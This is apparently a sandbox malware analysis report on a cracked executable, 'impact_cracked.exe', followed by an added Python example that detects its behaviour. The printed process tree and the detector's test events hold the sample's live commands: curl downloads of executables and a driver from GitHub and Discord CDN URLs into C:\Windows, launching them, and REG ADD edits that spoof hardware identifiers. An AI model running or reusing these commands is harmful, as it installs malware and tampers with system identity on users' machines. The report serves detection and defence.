Analysis Overview
SHA256
20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c
Threat Level: Likely malicious
The file impact_cracked.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Checks BIOS information in registry
VMProtect packed file
Themida packer
Executes dropped EXE
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-22 00:14
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-22 00:14
Reported
2023-12-22 00:16
Platform
win10v2004-20231215-en
Max time kernel
74s
Max time network
80s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\IME\AppleCleaner.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\IME\AppleCleaner.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\IME\AppleCleaner.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IME\AppleCleaner.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\IME\AppleCleaner.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IME\AppleCleaner.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GameBarPresenceWriter\Solution.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Solution64.sys | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Disk1.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Disk2.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Mac.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\IME\AppleCleaner.exe | C:\Windows\system32\curl.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe
"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&1
C:\Windows\system32\curl.exe
curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe
C:\Windows\IME\AppleCleaner.exe
C:\Windows\IME\AppleCleaner.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
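The process tree above shows three behaviours worth turning into detections: the loader hashing its own executable with certutil, curl.exe pulling payloads from legitimate hosting (raw.githubusercontent.com, cdn.discordapp.com) into C:\Windows, and a chain of reg.exe ADD commands overwriting the registry values that identify a machine (ComputerName, ComputerHardwareId(s), HwProfileGuid, SQMClient MachineId, MachineGuid, InstallTime/InstallDate), which is the classic HWID-spoofer pattern. The Python below is an added example, not part of this report or of the sample; it runs the three checks over process-creation events constructed from the command lines above (the event shape, image plus command line in the style of a Sysmon event 1, is an assumption, and the final Run-key event is a constructed control that should not match). Note the caveat built into the HWID check: reg.exe only accepts decimal or 0x-prefixed hexadecimal data for REG_DWORD/REG_QWORD, so the WinSqmFirstSessionStartTime, InstallTime and InstallDate commands above, whose data is a dash-separated random string, are expected to fail; the detector still reports them but marks the data as invalid so an analyst does not assume those values were actually changed.

```python
"""Three detections over process-creation events (added example, not report code).

Events are constructed from the report's process tree; the event shape
(image + command line) is an assumption modelled on Sysmon event 1.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    command_line: str   # command line as logged


# cmd.exe groups a quoted run into the surrounding token, so the key
# written as  Hardware" "Profiles  in the report becomes the single
# argument  Hardware Profiles  (a way to embed a space without quoting).
_TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line into arguments, merging quoted runs."""
    return [tok.replace('"', '') for tok in _TOKEN.findall(cmdline)]


# (lower-cased key suffix, lower-cased value name) pairs that fingerprint a
# machine; every one of them is rewritten by the report's reg.exe commands.
HWID_TARGETS = {
    (r"control\computername\computername", "computername"),
    (r"control\computername\activecomputername", "computername"),
    (r"control\systeminformation", "computerhardwareid"),
    (r"control\systeminformation", "computerhardwareids"),
    (r"control\idconfigdb\hardware profiles\0001", "hwprofileguid"),
    (r"microsoft\sqmclient", "machineid"),
    (r"microsoft\sqmclient", "winsqmfirstsessionstarttime"),
    (r"microsoft\windows nt\currentversion", "installtime"),
    (r"microsoft\windows nt\currentversion", "installdate"),
    (r"microsoft\cryptography", "machineguid"),
    (r"microsoft\cryptography", "guid"),
}

# Hosts seen in this report; a real deployment keeps its own list.
ABUSED_HOSTS = {"raw.githubusercontent.com", "cdn.discordapp.com"}


def parse_reg_add(cmdline: str):
    """Return (key, value_name, type, data) for a 'reg add' command line, else None."""
    toks = split_cmdline(cmdline)
    if len(toks) < 3 or toks[1].lower() != "add":
        return None
    if toks[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return None
    opts, i = {}, 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(toks):
            opts[flag] = toks[i + 1]
            i += 2
        else:
            i += 1
    return toks[2], opts.get("/v", ""), opts.get("/t", "REG_SZ").upper(), opts.get("/d", "")


def reg_data_is_valid(rtype: str, data: str) -> bool:
    """reg.exe takes only decimal or 0x-hex data for DWORD/QWORD; anything else fails."""
    if rtype in ("REG_DWORD", "REG_QWORD"):
        return re.fullmatch(r"(?:0x[0-9a-f]+|\d+)", data, re.I) is not None
    return True


def detect_hwid_spoof(ev: ProcEvent):
    """(target, data_valid) when reg.exe rewrites a machine-identity value, else None."""
    if not ev.image.lower().endswith("reg.exe"):
        return None
    parsed = parse_reg_add(ev.command_line)
    if parsed is None:
        return None
    key, name, rtype, data = parsed
    for suffix, vname in HWID_TARGETS:
        if name.lower() == vname and key.lower().endswith(suffix):
            return f"{suffix}\\{vname}", reg_data_is_valid(rtype, data)
    return None


def detect_curl_download(ev: ProcEvent):
    """curl.exe fetching from an abused host and/or writing under C:\\Windows."""
    if not ev.image.lower().endswith("curl.exe"):
        return None
    toks = split_cmdline(ev.command_line)
    url = next((t for t in toks if t.lower().startswith(("http://", "https://"))), None)
    dest = next((toks[i + 1] for i, t in enumerate(toks)
                 if t.lower() in ("--output", "-o") and i + 1 < len(toks)), None)
    if url is None or dest is None:
        return None
    host = (urlsplit(url).hostname or "").lower()
    windows_dir = dest.lower().startswith("c:\\windows\\")
    if host in ABUSED_HOSTS or windows_dir:
        return {"host": host, "dest": dest, "abused_host": host in ABUSED_HOSTS,
                "writes_windows_dir": windows_dir}
    return None


def detect_self_hash(events: list[ProcEvent]) -> list[str]:
    """certutil -hashfile aimed at a binary that is itself a process in the tree."""
    images = {e.image.lower() for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("certutil.exe"):
            continue
        toks = [t.lower() for t in split_cmdline(e.command_line)]
        if "-hashfile" in toks:
            i = toks.index("-hashfile")
            if i + 1 < len(toks) and toks[i + 1] in images:
                hits.append(toks[i + 1])
    return hits


def analyze(events: list[ProcEvent]) -> dict:
    hwid = [h for h in (detect_hwid_spoof(e) for e in events) if h]
    downloads = [d for d in (detect_curl_download(e) for e in events) if d]
    return {"hwid_spoof": hwid, "downloads": downloads, "self_hash": detect_self_hash(events)}


# Constructed from the report's process list; the last event is a control.
EVENTS = [
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"'),
    ProcEvent(r"C:\Windows\system32\certutil.exe",
              r'certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5'),
    ProcEvent(r"C:\Windows\system32\curl.exe",
              r"curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe"),
    ProcEvent(r"C:\Windows\system32\curl.exe",
              r"curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys"),
    ProcEvent(r"C:\Windows\system32\reg.exe",
              r"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f"),
    ProcEvent(r"C:\Windows\system32\reg.exe",
              r'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f'),
    ProcEvent(r"C:\Windows\system32\reg.exe",
              r"REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f"),
    ProcEvent(r"C:\Windows\system32\reg.exe",
              r'REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f'),
    ProcEvent(r"C:\Windows\system32\reg.exe",   # control: a Run key is not an HWID value
              r"REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Temp\u.exe /f"),
]

if __name__ == "__main__":
    for k, v in analyze(EVENTS).items():
        print(k, v)
```

The tokenizer is the part to get right: a naive split on whitespace would turn the `Hardware" "Profiles\0001` argument into two tokens and the HwProfileGuid and InstallTime commands would never match the target list. Matching on a key suffix rather than the full path also keeps the rule working when the same values are written through HKLM\SYSTEM\ControlSet001 instead of CurrentControlSet.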
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 5.0.26.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:51269 | | tcp |
| N/A | 127.0.0.1:51271 | | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:51282 | | tcp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| N/A | 127.0.0.1:51284 | | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:51298 | | tcp |
| N/A | 127.0.0.1:51300 | | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
Files
memory/4948-0-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
memory/4948-1-0x00007FFC05E10000-0x00007FFC05E12000-memory.dmp
memory/4948-2-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
memory/4948-6-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
C:\Windows\IME\AppleCleaner.exe
| MD5 | f96eb2236970fb3ea97101b923af4228 |
| SHA1 | e0eed80f1054acbf5389a7b8860a4503dd3e184a |
| SHA256 | 46fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172 |
| SHA512 | 2fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7 |
memory/3192-10-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
C:\Windows\IME\AppleCleaner.exe
| MD5 | 4639664afed57a9e2ebb0373a715f159 |
| SHA1 | a7c166c3eac948aed501aac067214001df4e09b6 |
| SHA256 | af9e98021b05a245873ccf8bc952f89a2a856ad70323ab2d5a6687bdf811fbd3 |
| SHA512 | 5b042a548cb1441b7e5fb2d526db386f0d842d998a8ff5685c9516db5402ad2d1dd7317be22e9c62349d46f961382cbc64db59564f54fe045f507791efea8ff9 |
memory/3192-12-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp
memory/3192-13-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-14-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-15-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-16-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-18-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp